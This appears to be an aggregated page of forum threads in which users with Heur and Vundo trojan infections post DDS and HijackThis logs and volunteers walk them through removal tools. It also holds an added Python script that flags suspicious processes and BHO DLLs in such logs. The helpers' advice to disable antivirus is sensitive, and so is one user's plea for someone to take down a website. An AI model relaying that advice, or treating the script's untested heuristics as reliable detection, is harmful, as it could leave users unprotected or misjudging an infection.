Is there anyway I can be assured that I'm not still infected? If I ever find one of these guys that put this crap out there, I'll personally waterboard them!

Thanks.

Tom

A:Trojan.Heur.*****@***

ps. I just ran ESET Online and it came up clean. I ran Malware and it came up clean. I ran Sophos Anti-Rootkit and it came up with a boatload of entries, but all were either unable to be removed or not advisable to remove. Do you think I'm trojan free now?

1 more replies

I have the following virus on my hard drive and cannot get rid of it:
CRF2F54.TMP
Location: C\Documents and Settings\Snowy's\Local Settings\Temp\CRF2F54.TMP
Virus Name: [email protected]
Message on pop-up screen: Fatal Error 1001 and 1022
The following subjects were identified:
atdmt.cookie
cgi-bin cookie
Specificclick cookie
yieldmanager cookie
Ask.com cookie:
quentserve cookie

A:Trojan.heur

It sounds like you need help with cleaning out malware,virus go here

http://www.techsupportforum.com/secu...oval-help.html

After running through all the steps, please post the requested logs in the Virus/Trojan/Spyware Help forum, not here.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Please note that the Virus/Trojan/Spyware Help forum is extremely busy, and it may take a while to receive a reply.

2 more replies

My Windows XP computer is infected with Gen:Trojan.Heur.P207887C7C7 virus. It is stuck in C/windows/system32/tegonaru.dll.

I used BitDefender 2009 to quarantine it, but could not delete it. My computer is still deadly slow.

I have tried the following, but no luck yet:

System Restore
BitDefender 2009
SuperAntiSpy
Malaware
SpyBot (keeps crashing before I can use it)
McAfee Stinger (still running it as we speak)

Any other suggestions?

A:Gen:Trojan.Heur.P207887C7C7

Moved from HJT forum to more appropriate.

6 more replies

After updating its virus signatures, NOD32 detected a BHO.NLN (no relation to my username) trojan inside my SysWOW64 directory in the form of XWR18467.DLL. I then proceeded to scan the entire Windows directory with NOD32 and it detected one more DLL infected, wr18467.dll without the X! That time it couldn't quarantine the DLL.

I then went inside the SysWOW64 directory and there were many copies of executables from a program I downloaded a while ago inside the directory! They were named xa155881237.exe, xa155877103.exe, xa155870489.exe, etc. That must be the culprit. I scanned one of them with http://virusscan.jotti.org/ and a few programs said it was Heur.W32.

In all honesty it was from a NoCD patch I got for a game a few days ago (remove SecuROM DRM which is even worse than viruses :D).

I am having no negative symptoms on my computer... yet... but I'm afraid it might be part of a botnet or something.

What am I to do?


Quote:
C:\Windows\SysWOW64\wr18467.dll - Win32/BHO.NLN trojan
Code:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:22:38 PM, on 1/19/2009
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Boot mode: Normal

Running processes:
D:\Vista\Program Files (x86)\Dropbox\dropbox.exe
D:\Vista\Program Files (x86)\RivaTuner v2.21\RivaTuner.exe
D:\Vista\Program Files (x86)\mIRC\mirc.exe
C:\Users\Mike\AppData\Local\Google\Update\GoogleUpdate.exe
D:\Vist... Read more

A:Heur.W32 and BHO.NLN trojan - Help! Windows XP x64

Hello and welcome to TSF.

We want all our members to perform the steps outlined in the link given below, before posting for assistance. There's a sticky at the top of this forum, and a "Having problems with spyware and pop-ups? First Steps" link at the top of each page.

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

1 more replies

Hi,

AVG keeps popping up that I have a win32/heur in c:\windows\system32\spoolsv.exe and a generic14.all4 trojan horse in c:\system volume information\_restore

Below you will find the dds information. Any help would be greatly appreciated.



DDS (Ver_09-07-30.01) - NTFSx86
Run by Kenny at 11:01:45.00 on Thu 09/17/2009
Internet Explorer: 7.0.5730.13 BrowserJavaVersion: 1.6.0_15
Microsoft Windows XP Home Edition 5.1.2600.2.1252.1.1033.18.2038.1300 [GMT -4:00]

AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF}

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\system32\brsvc01a.exe
C:\WINDOWS\system32\brss01a.exe
svchost.exe
C:\WINDOWS\System32\KLServer.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\WINDOWS\System32\ppmon.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Microsoft SQL Server\MSSQL$ASSET\Binn\sqlservr.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\WINDOWS\system32\WLTRAY.exe
C:\WINDOWS\s... Read more

A:Win32/Heur & Trojan

Hi,

Please do the following:


Download ComboFix from one of the following locations:
Link 1
Link 2

VERY IMPORTANT !!! Save ComboFix.exe to your Desktop

* IMPORTANT - Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. If you have difficulty properly disabling your protective programs, refer to this link here.

Double click on ComboFix.exe & follow the prompts.

As part of its process, ComboFix will check to see if the Microsoft Windows Recovery Console is installed. With malware infections being as they are today, it's strongly recommended to have this pre-installed on your machine before doing any malware removal. It will allow you to boot up into a special recovery/repair mode that will allow us to more easily help you should your computer have a problem after an attempted removal of malware.

Follow the prompts to allow ComboFix to download and install the Microsoft Windows Recovery Console, and when prompted, agree to the End-User License Agreement to install the Microsoft Windows Recovery Console.

**Please note: If the Microsoft Windows Recovery Console is already installed, ComboFix will continue its malware removal procedures.


Once the Microsoft Windows Recovery Console is installed using ComboFix, you should see the following message:


Click on Yes, to continue scanning for malware.
When finished, it ... Read more

2 more replies

I'm not sure how this got posted as a new topic.. I clicked to reply to a previous topic with the same virus Oo

Basically I have this virus on my computer at the moment, and it's completely messed up... when I load up the computer it displays only the desktop background, none of the desktop short cuts or taskbar at the bottom load up.

The only way I can start any programs is by opening the Task Manager with Ctrl+Alt+Delete, and selecting the program from the list. However Internet Explorer and Firefox won't open, so I can't download the malware program that was in the other topic to solve my problem...

I was prepared to format my hard drive after saving all the files I wanted to an external hard drive, but it won't even let me do that... it comes up with an error saying the drive is in use or something, and so won't format... I don't know what else to do ><

If anyone knows of a way to solve the problem, then it'll be much appreciated. I would even be happy with another way to format my hard drive, one that works that is heh.

Thanks for any help

A:Gen:Trojan.Heur.P207887C7C7

Try this scan. You can copy it over from another computer on a CD or pen drive if you need to.

Before we start fixing anything you should print out these instructions or copy them to a NotePad file so they will be accessible. Some steps will require you to disconnect from the Internet or use Safe Mode and you will not have access to this page.

Please download DrWeb-CureIt and save it to your desktop. DO NOT perform a scan yet.

Reboot your computer in "Safe Mode" using the F8 method. To do this, restart your computer and after hearing your computer beep once during startup (but before the Windows icon appears) press the F8 key repeatedly. A menu will appear with several options. Use the arrow keys to navigate and select the option to run Windows in "Safe Mode".

Scan with Dr.Web CureIt as follows:
Double-click on drweb-cureit.exe to open the program and click Start. (There is no need to update if you just downloaded the most current version.)
Read the Virus check by DrWeb scanner prompt and click Ok where asked to Start scan now? Allow the setup.exe to load if asked by any of your security programs.
The Express scan will automatically begin. (This is a short scan of files currently running in memory, boot sectors, and targeted folders.)
If prompted to download the Full version Free Trial, ignore and click the X to close the window.
If an infected object is found, you will be prompted to move anything that cannot be cured. Click Yes to All.
When complete, click Select All... Read more

6 more replies

Hello,

My computer has slowed down quite a bit and it seems my Kaspersky Internet Security is not able to get rid of a Heur Trojan Win.32 virus. I am hoping someone more tech savvy can help me out. I hope I have posted the information anyone would need to help me out. Thanks to all in advance.


DDS (Ver_09-05-14.01) - NTFSx86
Run by Kevin at 5:15:44.92 on Sun 05/24/2009
Internet Explorer: 6.0.2900.5512 BrowserJavaVersion: 1.6.0_07
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.2046.1450 [GMT -7:00]

AV: Kaspersky Internet Security *On-access scanning enabled* (Updated) {2C4D4BC6-0793-4956-A9F9-E252435469C0}
FW: Kaspersky Internet Security *enabled* {2C4D4BC6-0793-4956-A9F9-E252435469C0}

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\system32\spoolsv.exe
svchost.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\WINDOWS\system32\bgsvcgen.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\IoctlSvc.exe
C:\Program Files\CyberLink\Shared Files\RichVideo.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\RTHDCPL.EXE
C:\PROGRA~1\S... Read more

A:Need Help with HEUR Trojan Win.32 virus

Hello -

Does Kaspersky give an exact location for this threat? Full file name and path? Registry location? I'm not seeing anything particularly malicious in those logs.

11 more replies

Hi everyone!
My computer is infected with various Trojans but the most problematic of all is Gen:Trojan.Heur.Vundo.1

I'm running Windows Xp Pro sp3 and about 2 weeks ago my antivirus, BitDefender 2009, detected a number of infected "system32" files and put them in Quarantine. One of the virus was (and still is) Trojan.Vundo.GGW. I hold it responsible for all the difficulties we've been facing when surfing the Internet. Internet Explorer 7 (IE) would start opening an endless number of blank tabs after running normally for a while whereas Mozilla Firefox (MF) wouldn't open at all.
We've installed Spybot and managed to get rid of some of the infected files but the Trojans are still hiding and operating. Today I turned off system restore points, rebooted in safe mode, scanned the machine with SpyBot yet again, fixed the issues it found, booted Windows and enabled the system restore points. Even though I haven't yet tried IE, I must say, MF opens without having to switch off the AntiVirus.
The last I checked, there were some 96+ files infected by Trojan.Heur.Vundo.1 in Quarantine. I suspect this Trojan is an evolution of two other Trojans which the AV detected 2 weeks ago (Trojan.Heur.13 + Trojan.Vundo.GGw) and are still present in my computer.

As the list of infected/quarantined files gets longer and longer, I read and followed the Instructions posted in this forum:
backed up important files
uninstall any cracked applications and p2p programs
downloaded and ran ... Read more

A:Gen:Trojan.Heur.Vundo.1

Hi, welcome to TSF!

Please rename GMER to KMER then re-run it.

Post the log please.

19 more replies

Ok so I did a free virus scan with BitDefender Online and they found that I'm infected with - Gen:[email protected] in c:/windows/system32/stparaph.dll They can't remove it or clean it and when I look for the file, it's not there even though I have my setting set to view all hidden files & folders. I did a search online but can't find any info on it.. PLEASE HELP.. What is it and more importantly How do I get rid of it? Any help is appreciated.. Thank you!!!


Good evening. Please work through the instructions here and then start a new thread and post accordingly. As Helpers look for threads with zero replies I'll lock this one.

1 more replies

Hello~
I've been having problems with my computer for a little while now, its a bit complicated.

I've had this trojan for a little while and have been working here and there but cant seem to get to it and remove it.
It hasn't been a pest, until recently I downloaded a program called "Workspace Macro Pro 6.0"

I have BitDefender 2009 with everything updated, I recently ran a scan and it finds the trojan but says it cant remove it.
I also have RegCure, A registry cleaner, I run it about every day. I have TuneUp Utilities 2009, and have done the things it says except A few Visual Effects I cant seem to change.
I play games a lot and it practically freezes whenever I do anything other than walk, it's really bugging me

Also, the trojan was found in System Volume Information, I changed the folder options to show everything but the Folder is empty.

If can help I'd appreciate it, is there anything else I need to post?
Edit: I just thought to say, I run Windows XP Home Edition with Service Pack 2

A:Gen:Trojan.Heur.3000617435

Let's disable those programs or not load them, they will just interfere with cleaning the infection. Agreed?

Please download Malwarebytes Anti-Malware (v1.38) and save it to your desktop.
alternate download link 1
alternate download link 2
If you have a previous version of MBAM, remove it via Add/Remove Programs and download a fresh copy.
Make sure you are connected to the Internet.
Double-click on mbam-setup.exe to install the application.
When the installation begins, follow the prompts and do not make any changes to default settings.
When installation has finished, make sure you leave both of these checked:
Update Malwarebytes' Anti-Malware
Launch Malwarebytes' Anti-Malware
Then click Finish.
MBAM will automatically start and you will be asked to update the program before performing a scan.
If an update is found, the program will automatically update itself.
Press the OK button to close that box and continue.
If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install. Alternatively, you can update through MBAM's interface from a clean computer, copy the definitions (rules.ref) located in C:\Documents and Settings\All Users\Application Data\Malwarebytes\Malwarebytes' Anti-Malware from that system to a usb stick or CD and then copy it to the infected machine.
On the Scanner tab:
Make sure the "Perform Quick Scan" option is selected.
Then click on the Scan button.
If asked to select the drives to scan, leave all... Read more

8 more replies

Right folks, I have a trojan on my laptop, a win32 heur.

I've downloaded and ran c/ cleaner, avg8.0, trojan hunter, spybot search and destroy, and the rat is still lurking on my comp.

I've ran all scans, deleted the threats, turned off system restore before rebooting, still no luck.

Has anyone came across this? As I've said, tried the obvious and had no luck.

If anyone could help it would be much appreciated

A:trojan help: win32/heur

Hello, spb
Welcome to TSF

My name is Billy O'Neal and I will be helping you. (Billy or Bill is fine, if you like.)
Please give me some time to look over your computer's log(s).
Please take note of the following:
In the meantime, please refrain from making any changes to your computer.
Also, even if things appear to be running better, there is no guarantee that everything is finished. Please continue to check this forum post in order to ensure we get your system completely clean. We do not want to clean you part-way up, only to have the system re-infect itself. :)
If you do not understand any step(s) provided, please do not hesitate to ask before continuing. I would much rather clarify instructions or explain them differently than have something important broken.
Finally, please reply using the button in the lower left hand corner of your screen.
Old topics are closed after 3 days with no reply, and working topics are closed after 5 days. If for any reason you cannot complete instructions within that time, that's fine, just put a post here so that I know you're still here. We get a lot of people who simply leave, and if there is no contact for that amount of time I will have to assume you have "vanished" .

We need to create an OTViewIt Report
Please download OTViewIt by OldTimer.
Save it to your desktop.
Double click on the icon on your desktop.
Click the "Scan All Users" checkbox.
Push the button.
Two reports will open, copy and paste them in a repl... Read more

2 more replies

I ran bitdefender 2009 and it finds this but can't remove it. My computer is running very slow; when I click the start menu it just shows the outline of the box, no text. Same in outlook if you try to pull down any menus. I also ran PCcillian and it said it removed it, but it is still there. My computer runs Windows XP

Here is my DDS file


DDS (Ver_09-01-07.01) - NTFSx86
Run by TParker at 1222.28 on Thu 01/29/2009
Internet Explorer: 7.0.5730.13 BrowserJavaVersion: 1.6.0_05
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.997.478 [GMT -5:00]

AV: BitDefender Antivirus *On-access scanning enabled* (Updated)
FW: BitDefender Firewall *enabled*

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
C:\WINDOWS\system32\svchost -k rpcss
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\STacSV.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Microsoft IntelliType Pro\itype.exe
C:\Program Files\Microsoft IntelliPoint\ipoint.exe
C:\WINDOWS\sttray.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\Program Files\BitDefender\BitDefender 2009\bdagent.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Prog... Read more

A:Gen:Trojan.Heur.Vundo.1

Hi spensmom90

Please read this post completely before beginning the fix. If there's anything that you do not understand, kindly ask your questions before proceeding. Please ensure that there aren't any opened browsers when you are carrying out the procedures below. Save the following instructions in Notepad as this webpage would not be available when you're carrying out the fix.

We also suggest that you Subscribe to this thread to be notified of fixes as soon as they are posted by our Team. You can do this simply by clicking the "Thread Tools" button located in the original thread line and selecting "Subscribe to this Thread".

IT IS IMPORTANT THAT YOU DON'T MISS A STEP & PERFORM EVERYTHING IN THE RIGHT ORDER.

===============================================

Download Combofix from the link below, and save it to your desktop. For information regarding this download, please visit this webpage: http://www.bleepingcomputer.com/comb...o-use-combofix

Download ComboFix


**Note: It is important that it is saved directly to your desktop**

===========================================

1. Close any open browsers.

2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

===========================================

Double click on ComboFix.exe & follow the prompts.When finished, it will produce a report for you.
Please post the C:\ComboFix.txt for further review.
Note:
Do... Read more

1 more replies

Good afternoon,
a few days ago a Heur trojan virus affected my pc and I don't know what to do in order to delete it. Also, at the same time, it may not be the only virus in my computer even if I'm not completely sure about it.
I'm also attaching my DDS cause I can't open it any more.
Please help me
Thank you very much.

A:Virus HEUR trojan win 32

Sorry, I forgot to upload the files.

Here's the DDS:

.
DDS (Ver_2011-08-26.01) - NTFSx86
Internet Explorer: 9.0.8112.16421 BrowserJavaVersion: 1.6.0_26
Run by UTENTE at 21:57:35 on 2012-03-30
Microsoft Windows Vista Business 6.0.6002.2.1252.39.1040.18.3066.1308 [GMT 2:00]
.
AV: Kaspersky Internet Security *Enabled/Updated* {56547CC9-C9B2-849D-8FEF-A496150D6A06}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Kaspersky Internet Security *Enabled/Updated* {ED359D2D-EF88-8B13-B55F-9FE46E8A20BB}
FW: Kaspersky Internet Security *Enabled* {6E6FFDEC-83DD-85C5-A4B0-0DA3EBDE2D7D}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\Ati2evxx.exe
C:\Windows\system32\Dwm.exe
C:\Windows\explorer.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\IObit\IObit Malware Fighter\IMFsrv.exe
C:\Program Files\NewTech Infosystems\NTI Back... Read more

5 more replies

Hi folks, my name is Nate, thanks for taking the time to read this.

Recently my computer seems to have gotten infected with the Heur trojan. I am by no means inept with computers but when it comes to code or analyzing stuff like this I am left clueless. So, after a few days of unsuccessful attempts to rid myself of the virus, I've turned to the experts. Attach.txt has been attached.

I think I've followed the directions pretty closely, so here is the DDS info it says to copy and paste:

PS Although it didn't call for it, I think you guys will need the hijackthis log, I will copy that as well. Also, the AVG 8.0 FREE results.

Thank you very much! I've managed to get my system partially stable but I do not want to take any further action because this stuff might as well be in a foreign language as far as I'm concerned. As mentioned, the system appears to be somewhat stable, I get weird errors on startup, and AVG constantly says I have an infection. In any case, here is the info and thanks again.

DDS LOG:
DDS (Ver_09-03-16.01) - NTFSx86
Run by Nathan at 15:25:24.52 on Thu 04/09/2009
Internet Explorer: 6.0.2900.5512
AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated)

============== Running Processes ===============

============== Pseudo HJT Report ===============

uStart Page = hxxp://www.google.com/
BHO: c:\windows\system32\ds43g4nfjkn93.dll: {d5bf49a0-94f3-42bd-f434-3604812c8955} - c:\windows\system32\ds43g4nfjkn93.dll
TB: AVG Security Toolba... Read more

A:Heur trojan/virus

Hello! My name is Sam and I will be helping you. In order to see what's going on with your computer I will ask for you to post various logs from the tools that we will use to resolve your issue. Please also share with me any information about how your computer is reacting and behaving each step of the way as we work through this process.

We need to create an OTListIt2 Report
Please download OTListIt2 from here
Save it to your desktop.
Double click on the icon on your desktop.
Click the "Scan All Users" checkbox.
Push the "Run Scan" button.
The scan should take just a few minutes.
Copy the log that opens up and paste it back here in your next reply.

=============

The next log will show us any hidden files that are present.
Download GMER from here:
Unzip it to the desktop.
Open the program and click on the Rootkit tab.
Make sure all the boxes on the right of the screen are checked, EXCEPT for "Show All".
Click on Scan.
When the scan has run click Copy and paste the results (if any) into this thread.

2 more replies
Answer Match 52.08%

I am running WIN XP SP3 (updated) and have BitDefender as my AV. Lately, svchost.exe is being quarantined from randomly named \windows\temp folders. I experience occasional surfing problems (webpage not available) and a slight system slowdown. Any help removing this trojan shall be much appreciated. Here's my log:
DDS (Ver_09-12-01.01) - NTFSx86
Run by H&V at 4:52:35.20 on 15/12/2009
Internet Explorer: 8.0.6001.18702
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.2038.1471 [GMT 5.5:30]

AV: BitDefender Antivirus *On-access scanning enabled* (Updated) {6C4BB89C-B0ED-4F41-A29C-4373888923BB}
FW: BitDefender Firewall *enabled* {4055920F-2E99-48A8-A270-4243D2B8F242}

============== Running Processes ===============

D:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
D:\Program Files\Common Files\BitDefender\BitDefender Update Service\livesrv.exe
D:\Program Files\BitDefender\BitDefender 2009\vsserv.exe
D:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
D:\WINDOWS\system32\spoolsv.exe
svchost.exe
D:\Program Files\Common Files\Portrait Displays\Shared\DTSRVC.exe
D:\WINDOWS\system32\FsUsbExService.Exe
D:\Program Files\Java\jre6\bin\jqs.exe
D:\Program Files\Common Files\Portrait Displays\Drivers\pdisrvc.exe
D:\WINDOWS\system32\svchost.ex... Read more

A:Gen:Trojan.Heur.ImKfzKZUtpoi

Welcome to the BleepingComputer Forums. Since it has been a few days since you scanned your computer with HijackThis, we will need a new HijackThis log. If you have not already downloaded Random's System Information Tool (RSIT), please download Random's System Information Tool (RSIT) by random/random which includes a HijackThis log and save it to your desktop. If you have RSIT already on your computer, please run it again. Double click on RSIT.exe to run RSIT. Click Continue at the disclaimer screen. Please post the contents of log.txt. Thank you for your patience.

Please see Preparation Guide for use before posting about your potential Malware problem. If you have already posted this log at another forum or if you decide to seek help at another forum, please let us know. There is a shortage of helpers and taking the time of two volunteer helpers means that someone else may not be helped.

Please post your HijackThis log as a reply to this thread and not as an attachment. I am always leery of opening attachments so I always request that HijackThis logs are to be posted as a reply to the thread. I do not think that you are attaching anything scary but others may do so.

While we are working on your HijackThis log, please:
Reply to this thread; do not start another!
Do not make any changes on your computer during the cleaning process or download/add programs on your computer unless instructed to do so.
Do not run any other tool until ... Read more

2 more replies
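Two of the threads above hand a helper the same kind of evidence: a DDS log with a BHO line pointing at c:\windows\system32\ds43g4nfjkn93.dll, a SysWOW64 directory full of xa155881237.exe-style copies, and, in the thread just above, svchost.exe being quarantined out of randomly named \windows\temp folders. The script below is an added example (editor's code, not from any post, tool or vendor on this page) that parses the Running Processes block and the BHO lines of a DDS-style log and flags those three patterns: svchost.exe running from anywhere other than a Windows system directory, a binary running out of a Temp folder, and a file name that looks machine-generated. The log text is a constructed sample modelled on the excerpts in these threads, and the name heuristic (lots of digits, or almost no vowels in a long name) is an assumption for triage, not a detection rule anyone here published; a real log still belongs with the forum's helpers.

```python
"""Added triage helper for DDS-style logs (example code, not from any post above)."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed sample log in the DDS layout quoted in the threads above.
SAMPLE_LOG = r"""
DDS (Ver_09-12-01.01) - NTFSx86
Run by H&V at 4:52:35.20 on 15/12/2009

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\temp\kqzx8f\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Windows\SysWOW64\xa155881237.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Documents and Settings\User\Local Settings\Temp\CRF2F54.TMP

============== Pseudo HJT Report ===============

uStart Page = hxxp://www.google.com/
BHO: c:\windows\system32\ds43g4nfjkn93.dll: {d5bf49a0-94f3-42bd-f434-3604812c8955} - c:\windows\system32\ds43g4nfjkn93.dll
BHO: Java(tm) Plug-In SSV Helper: {761497bb-d6f0-462c-b6eb-d4daf1d92d43} - c:\program files\java\jre6\bin\ssv.dll
"""

SECTION_RE = re.compile(r"^=+\s*(?P<name>.+?)\s*=+$")
# Drive-letter path, optionally followed by " -k netsvcs"-style arguments.
# Bare "svchost.exe" lines (no path) carry no location and are skipped.
PROCESS_RE = re.compile(r"^(?P<path>[A-Za-z]:\\.*?)(?:\s+-\S.*)?$")
BHO_RE = re.compile(r"^BHO:\s*(?P<name>.+?):\s*\{(?P<clsid>[0-9A-Fa-f-]+)\}\s*-\s*(?P<dll>.+?)\s*$")

# Where a genuine svchost.exe may live; %SystemRoot% can sit on any drive (D:\WINDOWS in one log above).
SYSTEM_DIRS = ("\\windows\\system32", "\\windows\\syswow64", "\\winnt\\system32")
TEMP_DIRS = {"temp", "tmp"}


@dataclass(frozen=True)
class Finding:
    reason: str
    path: str


def parse_dds(text):
    """Return (process paths, [(clsid, dll)]) from the two DDS sections we care about."""
    processes, bhos, section = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SECTION_RE.match(line)
        if m:
            section = m.group("name").lower()
            continue
        if section == "running processes" and (m := PROCESS_RE.match(line)):
            processes.append(m.group("path"))
        elif section == "pseudo hjt report" and (m := BHO_RE.match(line)):
            bhos.append((m.group("clsid").lower(), m.group("dll")))
    return processes, bhos


def looks_generated(stem):
    """Assumed heuristic: long names stuffed with digits, or with almost no vowels."""
    if len(stem) < 8:
        return False
    if sum(c.isdigit() for c in stem) >= 3:
        return True
    letters = [c.lower() for c in stem if c.isalpha()]
    if len(stem) < 10 or not letters:
        return False
    return sum(c in "aeiouy" for c in letters) / len(letters) < 0.2


def check_path(path):
    """Reasons one executable/DLL path deserves a closer look (empty list if none)."""
    p = PureWindowsPath(path)
    parent = str(p.parent).lower()
    reasons = []
    if p.stem.lower() == "svchost" and not parent.endswith(SYSTEM_DIRS):
        reasons.append("svchost.exe outside a Windows system directory")
    if any(part.lower() in TEMP_DIRS for part in p.parts[:-1]):
        reasons.append("binary running from a Temp directory")
    if looks_generated(p.stem):
        reasons.append("machine-generated-looking file name")
    return reasons


def triage(text):
    """Run the checks over every process and BHO in a DDS log."""
    processes, bhos = parse_dds(text)
    findings = [Finding(r, path) for path in processes for r in check_path(path)]
    for clsid, dll in bhos:
        findings.extend(Finding(f"BHO {{{clsid}}}: {r}", dll) for r in check_path(dll))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f.reason:50} {f.path}")
```

On the sample it reports the temp-folder svchost.exe twice (wrong directory, and Temp), the SysWOW64 xa155881237.exe, the CRF2F54.TMP file in a user Temp folder, and the ds43g4nfjkn93.dll BHO, and stays quiet about the two genuine svchost lines and the Java BHO. It is deliberately only a first pass: a path that looks right can still be a replaced binary, which is why the helpers above ask for GMER and ComboFix output rather than a process list.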

hey guys
I got infected by that damn Trojan, it messed up my comp... no browsers would work apart from Google Chrome.. I'm lucky that I had it installed otherwise I wouldn't be able to use internet. Avast and AVG have failed to work on my comp! Even MSN crashes... So I used Win32kDiag and I'm enclosing the latest log file so you can have a look at it.

And by the way I got the url of website where I got that damn Trojan, any ethical hackers on forums would fancy taking that site down ?


Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not, please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order, clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed. Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Foll... Read more

2 more replies
Answer Match 51.66%

Ok everyone, let me see here. I am not a computer techie, but I know a little bit. I got this nasty virus Gen Trojan Heur Vundo 1, and need to correct this. I am using my laptop for now. I have WINDOWS XP 32 bit, DELL DIMENSION E310, and I was trying to get Avira Anti-Virus and Malwarebytes to work on my desktop. I had MSE (Microsoft Security Essentials, which was working until the virus got through); after that I cannot run any anti virus like Avira free anti virus or Malwarebytes. All my browsers keep popping up with IE.exe or Firefox.exe needs to close, and when I close them the windows close as well. System Restore I cannot do. I go to safe mode and get a BLUE SCREEN error code: run chkdsk /f, then error codes of 0X0000007B, 0XF7B64524, 0XC0000034, 0X00000000, 0X00000000. I CAN boot in regular mode, just not in safe mode or safe mode w/ networking. BTW I have Malwarebytes in my add/remove programs but I cannot uninstall to reinstall.

What I have tried:
1. To scan with safety.live.com, no luck; I get to 8 of 11 files installed and the computer stops/freezes.
2. Reinstall Malwarebytes and Avira freeware anti virus; they install but don't run.
3. My friend told me to try CCleaner to check and clean and check the registry.. no luck.
4. We have had some ice storms here in western Iowa so I have been in and out of power the past 3 days, and now the desktop boots and freezes after a few seconds.

Kinda getting mad but not sure what to do. Thank you in advance for any help that can be useful for me. BTW I t... Read more

A:got a virus Gen Trojan Heur Vundo 1

Member has solved their problem
Topic closed

1 more replies
Answer Match 51.66%

